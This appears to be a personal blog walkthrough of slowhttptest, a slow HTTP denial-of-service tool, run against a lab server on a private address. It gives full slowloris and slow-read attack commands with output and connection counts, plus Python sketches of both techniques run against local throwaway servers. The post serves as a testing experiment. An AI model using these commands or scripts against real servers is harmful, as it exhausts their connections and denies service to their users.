about slowhttptest
This tool enables you to perform slow HTTP DoS attacks, such as slow read, which can drive a server into TCP connection starvation.
Is my understanding correct? I am not familiar with security-related techniques :(
Anyway, let's try!
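Before installing anything, the slow-read idea itself can be sketched in a few lines of Python. Everything here is a stand-in (a throwaway local server instead of a real target, milliseconds instead of seconds); slowhttptest does the same thing with thousands of connections and a tiny advertised TCP window:

```python
import http.server
import socket
import threading
import time

class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"x" * 4096
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):      # silence per-request logging
        pass

# Throwaway local server standing in for the target; port 0 = pick a free port.
server = http.server.HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=server.serve_forever, daemon=True).start()
host, port = server.server_address

def slow_read(host, port, chunk=32, delay=0.005):
    """Send a normal request, then drain the reply a few bytes at a time."""
    s = socket.create_connection((host, port))
    s.sendall(b"GET / HTTP/1.1\r\nHost: %b\r\nConnection: close\r\n\r\n"
              % host.encode())
    received = 0
    while True:
        data = s.recv(chunk)   # tiny reads: the server's send buffer stays full
        if not data:
            break
        received += len(data)
        time.sleep(delay)      # slowhttptest reads -z bytes every -i seconds
    s.close()
    return received

total = slow_read(host, port)
print(total)                   # headers plus the 4096-byte body
server.shutdown()
```

One such connection is harmless; the attack comes from holding thousands of them open at once, each one pinning a worker and a full send buffer on the server.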
[ installation ]
Download the source code from https://code.google.com/p/slowhttptest/
# tar xzvf slowhttptest-1.5.tar.gz
# cd slowhttptest-1.5/
# ./configure
# make
# make install
|
[ how to use ]
Check the web site or run “man slowhttptest”.
[ sample usage ]
EXAMPLES
Start a slowloris test of host.example.com with 1000 connections, statistics goes into my_header_stats, interval between follow up headers is 10 seconds and connection rate is 200 connections per second:
$ slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://host.example.com/index.html -x 24 -p 3
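The -H test is a slowloris ("slow headers") attack: open a connection, send an incomplete request, and keep the connection alive by trickling one header line every interval (-i). A minimal sketch in Python against a throwaway local server (the header names are made up, and unlike a real attack this script eventually completes the request so it can terminate):

```python
import http.server
import socket
import threading
import time

class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):      # silence per-request logging
        pass

# Throwaway local server standing in for the target.
server = http.server.HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=server.serve_forever, daemon=True).start()
host, port = server.server_address

s = socket.create_connection((host, port))
# Send the request line and one header, but never the blank line that
# terminates the header section...
s.sendall(b"GET / HTTP/1.1\r\nHost: %b\r\n" % host.encode())
for i in range(3):
    time.sleep(0.1)                    # -i: interval between follow-up data
    s.sendall(b"X-a-%d: b\r\n" % i)    # bogus follow-up header, kept small (-x)
# ...until now. A real attack would keep trickling headers forever.
s.sendall(b"\r\n")
reply = s.recv(1024)
print(reply.split(b"\r\n")[0])         # the HTTP status line
s.close()
server.shutdown()
```

The server cannot respond (or free the worker handling the request) until the headers are complete, which is exactly what the attack exploits.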
|
Let's try this example:
# slowhttptest -c 1000 -H -g -o my_header_stats -i 1 -r 200 -t GET -u http://192.168.10.236 -x 24 -p 3
Fri Jun 7 21:50:27 2013:
Using:
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.10.236/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 1 seconds
connections per seconds: 200
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Fri Jun 7 21:50:27 2013:slow HTTP test status on 0th second:
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
<snip>
Fri Jun 7 21:54:27 2013:slow HTTP test status on 240th second:
initializing: 0
pending: 0
connected: 1000
error: 0
closed: 0
service available: YES
Fri Jun 7 21:54:28 2013:
Using:
test type: SLOW HEADERS
number of connections: 1000
URL: http://192.168.10.236/
verb: GET
Content-Length header value: 4096
follow up data max size: 52
interval between follow up data: 1 seconds
connections per seconds: 200
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Fri Jun 7 21:54:28 2013:Test ended on 241th second
status: Hit test time limit
|
On the target server during the test, about 1,000 concurrent TCP connections are open:
# netstat -an | grep -i tcp | grep 80 | wc -l
1007
|
View the result files with a web browser:
# ls my_header_stats.*
my_header_stats.csv my_header_stats.html
|
Next, try to establish 5,000 concurrent TCP connections. (Note that slowhttptest actually used only 4090 connections, probably capped by the process's open file descriptor limit.)
# slowhttptest -X -H -g -o result2 -w 1 -c 5000 -y 1 -t GET -u http://192.168.10.236
<snip>
Using:
test type: SLOW HEADERS
number of connections: 4090
URL: http://192.168.10.236/
verb: GET
Content-Length header value: 4096
follow up data max size: 68
interval between follow up data: 10 seconds
connections per seconds: 50
probe connection timeout: 5 seconds
test duration: 240 seconds
using proxy: no proxy
Fri Jun 7 22:10:11 2013:Test ended on 241th second
status: Hit test time limit
|
-w : minimum TCP window size the client advertises to the server
-y : maximum TCP window size the client advertises to the server
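In other words, -w and -y bound the TCP receive window the client advertises. The underlying mechanism can be poked at from Python via SO_RCVBUF, from which the kernel derives the advertised window (the exact clamped value you get back is OS-dependent):

```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Ask for a tiny receive buffer BEFORE connecting; the kernel derives the
# advertised TCP window from it, so the server can only have a handful of
# bytes in flight on this connection.
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 64)
# The kernel clamps the request to a minimum (and Linux doubles it for
# bookkeeping overhead), so read back what was actually granted:
granted = s.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
print(granted)
s.close()
```

slowhttptest picks a value in the [-w, -y] range per connection, which is why the capture below shows such small calculated window sizes.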
on the server
# netstat -an | grep 80 | wc -l
4106
|
Captured data:
Window scale: 7 (multiply by 128)
Kind: Window Scale (3)
.... 0... .... = Congestion Window Reduced (CWR): Not set
Window size value: 115
[Calculated window size: 14720]
|
The server sent very small packets.
$ tshark -r aa.pcap -V -R '(ip.src==192.168.10.236)' | grep ^Frame | head -5
Frame 2: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface 0
Frame 5: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on interface 0
|
How about this? Establish 5,000 concurrent TCP connections with a slow read test:
# slowhttptest -g -o result_file -c 5000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.10.236 -p 5 -l 350
<snip>
Using:
test type: SLOW READ
number of connections: 5000
URL: http://192.168.10.236/
verb: GET
receive window range: 10 - 20
pipeline factor: 1
read rate from receive buffer: 32 bytes / 5 sec
connections per seconds: 1000
probe connection timeout: 5 seconds
test duration: 350 seconds
using proxy: no proxy
Fri Jun 7 23:14:32 2013:Test ended on 351th second
|
on the server
# netstat -an | grep 80 | wc -l
5016
|
The result file can be viewed in a browser as before.
An interesting tool.